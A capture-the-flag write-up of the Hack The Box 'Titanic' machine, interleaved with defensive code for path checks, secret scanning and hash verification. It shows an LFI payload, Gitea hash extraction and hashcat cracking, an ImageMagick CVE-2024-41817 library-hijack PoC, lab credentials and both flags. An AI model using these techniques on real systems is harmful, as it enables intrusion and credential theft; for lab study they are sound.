HTB Titanic
Enumeration
There is a feature to book a trip, which then downloads the booking data as a JSON file: http://titanic.htb/download?ticket=08de371a-8c0c-4215-a977-b53459f4bb41.json
nmap:
```
┌──(d31ty㉿kali)-[~/Downloads/HTB/titanic]
└─$ nmap -sC -sV -A -T4 -Pn 10.10.11.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 19:02 IST
Nmap scan report for titanic.htb (10.10.11.55)
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_ 256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Titanic - Book Your Ship Trip
| http-server-header:
| Apache/2.4.52 (Ubuntu)
|_ Werkzeug/3.0.3 Python/3.10.12
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/19%OT=22%CT=1%CU=31573%PV=Y%DS=2%DC=T%G=Y%TM=67B5
OS:DD8A%P=aarch64-unknown-linux-gnu)SEQ(CI=Z)SEQ(SP=106%GCD=1%ISR=108%TI=Z%
OS:CI=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=F7%GC
OS:D=2%ISR=108%TI=Z%CI=Z%TS=A)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT1
OS:1NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE
OS:88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=
OS:)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 253.49 ms 10.10.14.1
2 253.34 ms titanic.htb (10.10.11.55)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.04 seconds
```
Simple LFI worked: http://titanic.htb/download?ticket=../../../etc/passwd
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
```
Two users with a login shell: root and developer.
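The bug behind `download?ticket=../../../etc/passwd` is the classic one: the handler joins a user-controlled file name onto its tickets directory and serves whatever comes out. The following is an added example, not the box's `app.py` (which the writeup never shows): it puts the join-and-trust pattern next to a hardened resolver that allowlists the UUID.json names the booking feature actually produces and confirms the resolved path still lies inside the base directory. `TICKETS_DIR` is an assumed location; the real one is not on the page.

```python
import os
import re
from typing import Dict, Iterable, Optional, Tuple

# Assumed for this example: the directory the booking feature writes ticket
# JSON files into. The real location on the box is not shown in the writeup.
TICKETS_DIR = "/opt/app/tickets"

# The booking feature hands out names like 08de371a-8c0c-4215-a977-b53459f4bb41.json,
# so the allowlist can be exactly that shape: a lowercase UUID plus ".json".
TICKET_NAME_RE = re.compile(
    r"\A[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.json\Z"
)


def vulnerable_ticket_path(ticket: str, base: str = TICKETS_DIR) -> str:
    """The traversal-prone pattern: join the user-supplied name and trust it.

    os.path.join walks '..' segments without complaint and discards `base`
    entirely if `ticket` is absolute, so '../../../etc/passwd' ends up as
    /etc/passwd, which is exactly what the LFI in the writeup reads.
    """
    return os.path.normpath(os.path.join(base, ticket))


def safe_ticket_path(ticket: str, base: str = TICKETS_DIR) -> Optional[str]:
    """Return the on-disk path for `ticket`, or None if the request is unsafe.

    Two independent checks, either of which alone stops the traversal above:
      1. the name must match the exact format the application generates;
      2. the resolved path (realpath normalises '..' and follows symlinks)
         must still be inside `base`; the comparison appends os.sep so that
         a sibling such as /opt/app/tickets2 is not accepted as a child.
    """
    if not TICKET_NAME_RE.match(ticket):
        return None
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, ticket))
    if not candidate.startswith(base_real + os.sep):
        return None
    return candidate


def classify_requests(tickets: Iterable[str]) -> Dict[str, Tuple[str, Optional[str]]]:
    """Map each requested ticket name to ('served', path) or ('rejected', None)."""
    result = {}
    for ticket in tickets:
        path = safe_ticket_path(ticket)
        result[ticket] = ("served", path) if path else ("rejected", None)
    return result


if __name__ == "__main__":
    # Constructed sample: the legitimate name from the writeup and the LFI payload.
    for name in ("08de371a-8c0c-4215-a977-b53459f4bb41.json", "../../../etc/passwd"):
        print(f"{name!r}: join-and-trust -> {vulnerable_ticket_path(name)}; "
              f"hardened -> {safe_ticket_path(name)}")
```

In a Flask view the result of `safe_ticket_path` goes to `send_file` when it is not None and to `abort(404)` otherwise; the allowlist alone would already have blocked the payload, the containment check is what protects you when the naming scheme later loosens.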
Dirsearch didn't get anything. gobuster vhost:
```
┌──(d31ty㉿kali)-[~/Downloads/HTB/titanic]
└─$ gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u titanic.htb -t 50 --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://titanic.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.titanic.htb Status: 200 [Size: 13982]
```
On dev.titanic.htb I found the Gitea version: 1.22.1
![[Screenshot 2025-02-19 at 19.35.41.png]]
Ran dirsearch again :)
```
┌──(d31ty㉿kali)-[~/Downloads/HTB/titanic]
└─$ dirsearch -u http://dev.titanic.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/d31ty/Downloads/HTB/titanic/reports/http_dev.titanic.htb/_25-02-19_19-37-15.txt
Target: http://dev.titanic.htb/
[19:37:15] Starting:
[19:37:33] 404 - 0B - /.well-known/acme-challenge
[19:37:33] 404 - 0B - /.well-known/apple-app-site-association
[19:37:33] 404 - 0B - /.well-known/apple-developer-merchant-domain-association
[19:37:33] 404 - 0B - /.well-known/acme-challenge/dtfy
[19:37:33] 404 - 0B - /.well-known/ashrae
[19:37:33] 404 - 0B - /.well-known/assetlinks.json
[19:37:33] 404 - 0B - /.well-known/browserid
[19:37:33] 404 - 0B - /.well-known/caldav
[19:37:33] 404 - 0B - /.well-known/dnt
[19:37:33] 404 - 0B - /.well-known/csvm
[19:37:33] 404 - 0B - /.well-known/dnt-policy.txt
[19:37:33] 404 - 0B - /.well-known/ni
[19:37:33] 404 - 0B - /.well-known/est
[19:37:33] 404 - 0B - /.well-known/jwks
[19:37:33] 404 - 0B - /.well-known/carddav
[19:37:33] 404 - 0B - /.well-known/host-meta
[19:37:33] 404 - 0B - /.well-known/core
[19:37:33] 404 - 0B - /.well-known/hoba
[19:37:33] 404 - 0B - /.well-known/host-meta.json
[19:37:33] 404 - 0B - /.well-known/jwks.json
[19:37:33] 404 - 0B - /.well-known/stun-key
[19:37:33] 404 - 0B - /.well-known/time
[19:37:33] 404 - 0B - /.well-known/void
[19:37:33] 404 - 0B - /.well-known/genid
[19:37:33] 404 - 10B - /.well-known/webfinger
[19:37:33] 404 - 0B - /.well-known/keybase.txt
[19:37:33] 200 - 1KB - /.well-known/openid-configuration
[19:37:33] 404 - 0B - /.well-known/repute-template
[19:37:33] 404 - 0B - /.well-known/openorg
[19:37:33] 404 - 0B - /.well-known/posh
[19:37:33] 404 - 0B - /.well-known/reload-config
[19:37:33] 200 - 206B - /.well-known/security.txt
[19:37:33] 404 - 0B - /.well-known/timezone
[19:37:47] 303 - 38B - /admin -> /user/login
[19:37:48] 303 - 38B - /admin/ -> /user/login
[19:38:04] 200 - 20KB - /administrator
[19:38:04] 200 - 20KB - /administrator/
[19:38:08] 404 - 19B - /api/v1/swagger.yaml
[19:38:08] 404 - 19B - /api/v1/swagger.json
[19:38:08] 404 - 19B - /api/v1/
[19:38:08] 200 - 433B - /api/swagger
[19:38:08] 404 - 19B - /api/v1
[19:38:10] 404 - 0B - /assets/fckeditor
[19:38:10] 404 - 0B - /assets/file
[19:38:10] 404 - 0B - /assets/js/fckeditor
[19:38:10] 404 - 0B - /assets/pubspec.yaml
[19:38:10] 404 - 0B - /assets/npm-debug.log
[19:38:26] 200 - 7KB - /developer
[19:38:30] 303 - 41B - /explore -> /explore/repos
[19:38:31] 200 - 6KB - /explore/repos
[19:38:31] 301 - 58B - /favicon.ico -> /assets/img/favicon.png
[19:38:40] 303 - 38B - /issues -> /user/login
[19:39:04] 404 - 19B - /robots.txt
[19:39:09] 200 - 170B - /sitemap.xml
[19:39:21] 200 - 11KB - /user/login/
[19:39:22] 401 - 50B - /v2/_catalog
[19:39:22] 401 - 50B - /v2
[19:39:22] 401 - 50B - /v2/
[19:39:22] 404 - 19B - /v2/api-docs
[19:39:22] 404 - 19B - /v2/keys/?recursive=true
```
![[Screenshot 2025-02-19 at 19.40.47.png]]
We got info to check localhost once we get a foothold. ![[Screenshot 2025-02-19 at 19.41.20.png]]
```yaml
version: '3'
services:
  gitea:
    image: gitea/gitea
    container_name: gitea
    ports:
      - "127.0.0.1:3000:3000"
      - "127.0.0.1:2222:22" # Optional for SSH access
    volumes:
      - /home/developer/gitea/data:/data # Replace with your path
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always
```
In the version history of this file, I found this:
```yaml
version: '3.8'
services:
  mysql:
    image: mysql:8.0
    container_name: mysql
    ports:
      - "127.0.0.1:3306:3306"
    environment:
      MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'
      MYSQL_DATABASE: tickets
      MYSQL_USER: sql_svc
      MYSQL_PASSWORD: sql_password
    restart: always
```
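The two compose files together show the recurring failure mode: the current file is clean, but an earlier commit hard-coded the MySQL root and service passwords, and git history keeps that commit readable to anyone who can see the repository. The following is an added example of the kind of check that catches this before it is committed; it is my code, not anything from the box or the Gitea project. It scans compose text line by line, flags literal values on secret-looking environment keys, and accepts `${VAR}` references and the `_FILE` (Docker secrets) convention. Both compose inputs below are constructed for the example, the first modelled on the leaked file above.

```python
import re
import sys
from typing import List, Tuple

# Environment keys whose value should never be a literal in a committed file.
SECRET_KEY_RE = re.compile(r"PASSWORD|PASSWD|SECRET|TOKEN|API_KEY|PRIVATE_KEY", re.IGNORECASE)

# compose writes environment entries either as a mapping ("KEY: value")
# or as a list ("- KEY=value"); both are matched per line.
MAPPING_RE = re.compile(r"^\s*([A-Z][A-Z0-9_]*)\s*:\s*(.*?)\s*$")
LIST_RE = re.compile(r"^\s*-\s*([A-Z][A-Z0-9_]*)=(.*?)\s*$")

# A value that only refers to the environment ("${DB_PASS}" or "$DB_PASS") is fine:
# the secret then lives outside the repository.
ENV_REFERENCE_RE = re.compile(r"^\$\{?[A-Za-z_][A-Za-z0-9_]*\}?$")


def find_inline_secrets(compose_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, key, value) for each secret-looking key with a literal value.

    Not reported: keys ending in _FILE (Docker secrets convention, the value is
    a path), values that are only an environment reference, and empty values.
    """
    findings = []
    for lineno, line in enumerate(compose_text.splitlines(), start=1):
        match = MAPPING_RE.match(line) or LIST_RE.match(line)
        if not match:
            continue
        key, value = match.group(1), match.group(2).strip().strip("'\"")
        if not SECRET_KEY_RE.search(key) or key.endswith("_FILE"):
            continue
        if not value or ENV_REFERENCE_RE.match(value):
            continue
        findings.append((lineno, key, value))
    return findings


# Constructed input, modelled on the compose file found in the Gitea history.
LEAKED_COMPOSE = """\
version: '3.8'
services:
  mysql:
    image: mysql:8.0
    container_name: mysql
    ports:
      - "127.0.0.1:3306:3306"
    environment:
      MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'
      MYSQL_DATABASE: tickets
      MYSQL_USER: sql_svc
      MYSQL_PASSWORD: sql_password
    restart: always
"""

# Constructed: the same service with the credentials moved out of the file.
HARDENED_COMPOSE = """\
version: '3.8'
services:
  mysql:
    image: mysql:8.0
    environment:
      MYSQL_ROOT_PASSWORD_FILE: /run/secrets/mysql_root
      MYSQL_DATABASE: tickets
      MYSQL_USER: sql_svc
      MYSQL_PASSWORD: ${MYSQL_PASSWORD}
    secrets:
      - mysql_root
secrets:
  mysql_root:
    file: ./secrets/mysql_root.txt
"""


if __name__ == "__main__":
    # With a path argument this behaves like a pre-commit hook: non-zero exit on findings.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else LEAKED_COMPOSE
    hits = find_inline_secrets(text)
    for lineno, key, value in hits:
        print(f"line {lineno}: {key} has an inline literal ({len(value)} chars)")
    sys.exit(1 if hits else 0)
```

Removing the literal from the current file is not enough once it has been pushed: the commit is still there, so the credential has to be rotated as well, and history rewritten only if the repository is private enough for that to matter.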
In the Flask app folder I found user info:
```json
{"name": "Jack Dawson", "email": "jack.dawson@titanic.htb", "phone": "555-123-4567", "date": "2024-08-23", "cabin": "Standard"}
```
```json
{"name": "Rose DeWitt Bukater", "email": "rose.bukater@titanic.htb", "phone": "643-999-021", "date": "2024-08-22", "cabin": "Suite"}
```
I figured I could use that LFI to read this file: /home/developer/gitea/data/gitea/conf/app.ini ![[Screenshot 2025-02-19 at 19.53.35.png]]
![[Screenshot 2025-02-19 at 19.55.25.png]]
From this, let's get the DB file as well! /home/developer/gitea/data/gitea/gitea.db
![[Screenshot 2025-02-19 at 19.59.33.png]]
| User | Password hash |
| --- | --- |
| administrator | cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136 |
| developer | e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 |
| bread | 58b9ab9a67551c76f0b584691ced5a50eb9d99f8d0875ec0f5984fceb0cf06dbc22024fbe0acae7089606629034e33ee037c |
| simoss | b36246d41a4f7b5665bd0f4285f595a6c3fb54b781d6ebdabd7ab4139d914c44c598232d585f42e870a9d47073ea247e1e0d |

All the passwords use the same hash algorithm: pbkdf2$50000$50
Whoaaaaa! Now we need to crack the password hashes. As the email column makes clear, we should be interested in the administrator and developer users.
Let's stick with the developer user!
Then I need to find a way to convert the stored password (hashed and salted) into a proper hash format so that hashcat can crack it. I found this article useful: HTB Complied
Command:
```bash
sqlite3 gitea.db "select passwd,salt,name from user" | while read data; do digest=$(echo "$data" | cut -d'|' -f1 | xxd -r -p | base64); salt=$(echo "$data" | cut -d'|' -f2 | xxd -r -p | base64); name=$(echo $data | cut -d'|' -f 3); echo "${name}:sha256:50000:${salt}:${digest}"; done | tee gitea.hashes
```
```
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
bread:sha256:50000:WQbGrCApRPAbWhPfhMuYqw==:WLmrmmdVHHbwtYRpHO1aUOudmfjQh17A9ZhPzrDPBtvCICT74KyucIlgZikDTjPuA3w=
simoss:sha256:50000:S9815lNdl9JIU5ioGWXhVA==:s2JG1BpPe1ZlvQ9ChfWVpsP7VLeB1uvavXq0E52RTETFmCMtWF9C6HCp1HBz6iR+Hg0=
```
Now it's time to crack.
```
┌──(d31ty㉿kali)-[~/Downloads/HTB/titanic]
└─$ hashcat gitea.hashes /usr/share/wordlists/rockyou.txt --user
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528
```
![[Screenshot 2025-02-19 at 20.22.55.png]]
Logged in as developer: User flag: 645be18c59074c9c167f180e687e8d85
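What the conversion one-liner above is really doing: Gitea's `pbkdf2$50000$50` means PBKDF2-HMAC-SHA256 with 50000 iterations and a 50-byte derived key, and the `passwd` and `salt` columns are hex strings, which is why they pass through `xxd -r -p` before being base64-encoded into hashcat's `sha256:<iterations>:<salt>:<digest>` form. The following is an added example, my own code rather than anything from the writeup or from Gitea: it reproduces that conversion in Python and then verifies a candidate password against a converted line, using the developer row and the password hashcat recovered. The zero salt passed to `to_hashcat_line` is a constructed stand-in, since the page shows the salt only in its base64 form.

```python
import base64
import hashlib
import hmac
from typing import Tuple

# PASSWORD_HASH_ALGO as found in the box's app.ini: PBKDF2-HMAC-SHA256,
# 50000 iterations, 50-byte derived key.
GITEA_ALGO = "pbkdf2$50000$50"


def parse_gitea_algo(algo: str) -> Tuple[int, int]:
    """'pbkdf2$50000$50' -> (iterations, key_length_in_bytes)."""
    name, iterations, key_len = algo.split("$")
    if name != "pbkdf2":
        raise ValueError(f"unsupported algorithm: {name}")
    return int(iterations), int(key_len)


def to_hashcat_line(name: str, passwd_hex: str, salt_hex: str, algo: str = GITEA_ALGO) -> str:
    """Python equivalent of the sqlite3/xxd/base64 one-liner in the writeup.

    hashcat's PBKDF2-HMAC-SHA256 mode expects sha256:<iter>:<b64 salt>:<b64 digest>;
    the leading 'name:' field is what `--user` strips off before hashing.
    """
    iterations, key_len = parse_gitea_algo(algo)
    digest = bytes.fromhex(passwd_hex)
    if len(digest) != key_len:
        raise ValueError(f"digest is {len(digest)} bytes, algorithm says {key_len}")
    salt_b64 = base64.b64encode(bytes.fromhex(salt_hex)).decode()
    digest_b64 = base64.b64encode(digest).decode()
    return f"{name}:sha256:{iterations}:{salt_b64}:{digest_b64}"


def verify_hashcat_line(line: str, password: str) -> bool:
    """Check `password` against one 'name:sha256:iter:salt:digest' line.

    Recomputes PBKDF2 over the stored salt for the full stored key length and
    compares in constant time, which is what Gitea itself does at login.
    """
    _name, scheme, iterations, salt_b64, digest_b64 = line.split(":")
    if scheme != "sha256":
        raise ValueError(f"unsupported scheme: {scheme}")
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations), dklen=len(expected))
    return hmac.compare_digest(derived, expected)


# Values taken from the writeup: the developer row of gitea.db and its converted line.
DEVELOPER_PASSWD_HEX = (
    "e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc"
    "8efc5dbef30bf1682619263444ea594cfb56"
)
DEVELOPER_HASHCAT_LINE = (
    "developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:"
    "5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y="
)

if __name__ == "__main__":
    # Constructed zero salt: only the digest field is compared against the page.
    print(to_hashcat_line("developer", DEVELOPER_PASSWD_HEX, "00" * 16))
    print(verify_hashcat_line(DEVELOPER_HASHCAT_LINE, "25282528"))
```

The defender's reading of this: 50000 PBKDF2 iterations did nothing for an eight-digit password that sits in rockyou, and the round count only slows a dictionary attack linearly. Password policy and a memory-hard scheme (Gitea also offers argon2 via `PASSWORD_HASH_ALGO`) matter more than the iteration count.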
Privilege Escalation
```
╔══════════╣ PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses
/home/developer/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
```
![[Screenshot 2025-02-19 at 21.07.51.png]]
Couldn't exploit further…
```
Version: mongo Not Found
mongod Not Found
-rw-r--r-- 1 root root 2279 Nov 23 2020 /etc/fail2ban/filter.d/mongodb-auth.conf
```
Couldn't exploit further…
Also, localhost:3000 is nothing but dev.titanic.htb, so no use in that either…
```
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root developer 7568 Aug 1 2024 /opt/app/templates/index.html
-rw-r----- 1 root developer 209762 Feb 3 17:13 /opt/app/static/assets/images/favicon.ico
-rw-r----- 1 root developer 280817 Feb 3 17:13 /opt/app/static/assets/images/luxury-cabins.jpg
-rw-r----- 1 root developer 291864 Feb 3 17:13 /opt/app/static/assets/images/entertainment.jpg
-rw-r----- 1 root developer 232842 Feb 3 17:13 /opt/app/static/assets/images/home.jpg
-rw-r----- 1 root developer 280854 Feb 3 17:13 /opt/app/static/assets/images/exquisite-dining.jpg
-rw-r----- 1 root developer 0 Feb 19 15:38 /opt/app/static/assets/images/metadata.log
-rw-r----- 1 root developer 567 Aug 1 2024 /opt/app/static/styles.css
-rwxr-x--- 1 root developer 1598 Aug 2 2024 /opt/app/app.py
-rw-r----- 1 root developer 33 Feb 19 14:43 /home/developer/user.txt
```
This looked interesting: ![[Screenshot 2025-02-19 at 21.17.40.png]]
This command also gets you there: `find / -writable -type d 2>/dev/null`
![[Screenshot 2025-02-19 at 21.19.05.png]] Along the way I found this as well. I came back to it because there was nothing interesting in /opt/app/static/assets/images itself.
![[Screenshot 2025-02-19 at 21.20.13.png]]
`/usr/bin/magick --version`
![[Screenshot 2025-02-19 at 21.20.34.png]] ImageMagick 7.1.1-35 - found CVE-2024-41817. The official PoC:
```bash
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
    system("id");
    exit(0);
}
EOF
```
This can be executed in the images folder.
To get root privileges here I could have read /etc/shadow or looked for root's .ssh/id_rsa, but I figured simply reading the root flag would do :)
But we can do this:
```bash
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
    system("cp /root/root.txt root_d31ty.txt; chmod 754 root_d31ty.txt");
    exit(0);
}
EOF
```
After some time we get the root flag. ![[Screenshot 2025-02-19 at 21.29.21.png]]
Root flag: c323bf5d42df8181c21b4f80fb4f4feb